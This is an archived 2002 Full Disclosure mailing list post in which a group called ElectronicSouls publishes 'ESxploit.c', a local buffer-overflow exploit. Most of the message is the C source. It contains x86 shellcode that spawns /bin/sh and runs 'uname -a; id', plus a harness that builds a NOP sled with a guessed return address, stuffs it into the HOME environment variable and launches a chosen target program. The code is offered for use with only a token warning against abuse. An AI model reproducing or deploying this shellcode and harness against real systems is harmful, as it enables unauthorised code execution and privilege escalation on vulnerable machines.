Full Disclosure mailing list archives
[ElectronicSouls] - Advances in Binary Auditing (PART TWO)
From: es () hush com
Date: Thu, 28 Nov 2002 22:34:18 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, We apologize for our oversight; in the first message sent titled 'Advances in Binary Auditing', we neglected to include the exploit portion of the auditing tool. Here it is, enjoy, and do not abuse the knowledge! # cat ESxploit.c /* Exploit part of ESxploit, * local bof testing application * (C) BrainStorm - ElectronicSouls */ #define DEF_OFFSET 10 static char exec[]= "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" "\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65" "\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73" "\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b" "\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69" "\x6e\x2f\x73\x68\x01"; long esp(void){__asm__("movl %esp,%eax");} int main(int argc,char **argv){ char bof[3000]; int i,offset; long ret; if(argc>1){offset=atoi(argv[1]);} else{offset=DEF_OFFSET;} ret=(esp()-offset); printf(" *** ESxploit - BOF testing application \n"); printf(" *** Return Address: 0x%lx, Offset: %d. ",ret,offset); printf("\n\n"); for(i=1;i<241;i+=4){*(long *)&bof[i]=ret;} for(i=0;i<(237-strlen(exec));i++){*(bof+i)=0x90;} memcpy(bof+i,exec,strlen(exec)); setenv("HOME", bof, 1); execlp(argv[2], argv[3], bof, 0); } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "The winner won the race." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nCnIMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltz/kAoJkSeE6eMaIk wS7lssZ1RkKSsTr/AKC+SiYXzT8OO8/2k/TirxHfVYyeaw== =lfo+ -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Advances in Binary Auditing (PART TWO) es (Nov 28)